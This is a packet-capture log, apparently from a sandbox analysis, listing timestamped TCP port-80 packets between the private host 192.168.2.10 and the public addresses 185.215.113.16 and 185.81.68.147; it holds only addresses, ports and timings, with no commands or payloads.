Dec 12, 2024 16:48:46.746448040 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.746758938 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.747926950 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.747971058 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.748262882 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.748400927 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.749449015 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.749649048 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.749835968 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.749877930 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.750968933 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.751209021 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.751914978 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.752017021 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.752548933 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.752556086 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.752626896 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.754034042 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.754105091 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.754266977 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.754393101 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.755521059 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.755620003 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.755677938 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.755739927 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.756951094 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.757038116 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.757138014 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.757211924 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.758395910 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.758733034 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.759583950 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.759646893 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.759887934 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.760004044 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.760936975 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.761388063 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.761394978 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.761524916 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.762805939 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.762820959 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.762953043 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.764229059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.764280081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.764285088 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.764381886 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.764385939 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.764398098 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.764432907 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.764714003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.764802933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.765139103 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.765552998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.765608072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.765706062 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.765739918 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.765746117 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.765911102 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.766555071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.766807079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.766900063 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.767075062 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.767220974 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.767282009 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.767338037 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.767527103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.767971992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.768054008 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.768531084 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.768578053 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.768579006 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.768590927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.768611908 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.768697023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.768785954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.769603014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.769942045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.769952059 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.769963980 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.770029068 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.770050049 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.770606995 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.771370888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.771383047 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.771426916 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.771457911 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.771472931 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.771586895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.771667004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.771747112 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.772633076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.772752047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.772766113 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.772778034 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.772838116 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.772850990 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.773770094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.774177074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.774189949 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.774208069 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.774256945 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.774267912 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.774637938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.774748087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.774832010 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.775582075 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.775618076 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.775648117 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.775659084 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.775686979 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.775710106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.775789976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.776673079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.777065992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.777071953 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.777084112 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.777143955 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.777152061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.777177095 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.777723074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.778137922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.778217077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.778491974 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.778502941 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.778533936 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.778726101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.778884888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.778959990 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.779748917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.779825926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.779830933 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.779907942 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.779915094 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.779928923 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.779963970 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.780746937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.780765057 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.780864954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.781349897 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.781363010 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.781392097 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.781402111 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.781840086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.781852961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.781934977 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.782746077 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.782783985 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.783160925 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.783174038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.783185959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.783199072 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.783276081 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.783922911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.784003973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.784090042 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.784219027 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.784230947 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.784261942 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.784276009 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.784796000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.784881115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.784960032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.785445929 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.785487890 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.785608053 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.785650015 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.785919905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.785929918 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.786019087 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.786886930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.786932945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.786945105 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.787004948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.787009954 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.787015915 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.787053108 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.787873030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.787988901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.788075924 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.788300037 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.788337946 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.788907051 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.788918018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.788930893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.788944960 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.789026976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.789793968 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.789833069 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.789845943 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.789884090 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.789966106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.790113926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.790198088 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.790941954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.791224957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.791240931 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.791248083 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.791306019 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.791327000 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.791920900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.791939020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.792016983 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.792480946 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.792524099 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.792712927 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.792757034 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.792947054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.793159008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.793239117 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.793920040 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.793961048 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.793976068 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.793987036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.794018984 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.794037104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.794111967 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.794986010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.795744896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.795825958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.796010971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.796111107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.796210051 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.797066927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.797069073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.797168016 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.798052073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.798434019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.798526049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.799093962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.799770117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.799849987 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.800031900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.801074028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.801090956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.801182985 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.801191092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.801295042 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.802078009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.802092075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.802181005 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.803052902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.803248882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.803344011 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.804131985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.805135965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.805149078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.805162907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.805222988 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.805264950 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.806174994 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.807233095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.807245970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.807327986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.807327986 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.807367086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.808206081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.809235096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.809246063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.809274912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.809329987 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.809356928 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.810178041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.811028957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.811108112 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.811213970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.811224937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.811307907 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.812212944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.813282967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.813293934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.813361883 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.813380003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.813417912 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.814240932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.814615011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.814694881 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.815321922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.815547943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.815635920 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.816293955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.817411900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.817424059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.817502975 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.907020092 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.907068968 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.907164097 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.907207012 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.907511950 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.907517910 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.907529116 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.907553911 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.907577991 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.908835888 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.908873081 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.908992052 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.909029961 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.909842968 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.909885883 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.910171032 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.910211086 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.910849094 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.910887003 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.911021948 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.911062956 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.911866903 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.911910057 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.912048101 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.912086964 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.912425041 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.912436008 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.912462950 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.912488937 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.913274050 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.913309097 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.913563013 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.913594961 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.914254904 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.914335966 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.914577961 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.914624929 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.915258884 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.915298939 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.915441036 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.915482044 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.916238070 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.916286945 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.916416883 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.916460991 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.917212963 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.917263985 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.917290926 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.917327881 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.918191910 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.918225050 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.918307066 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.918344021 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.919203043 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.919239998 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.919346094 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.919384003 CET	49957	80	192.168.2.10	185.215.113.16
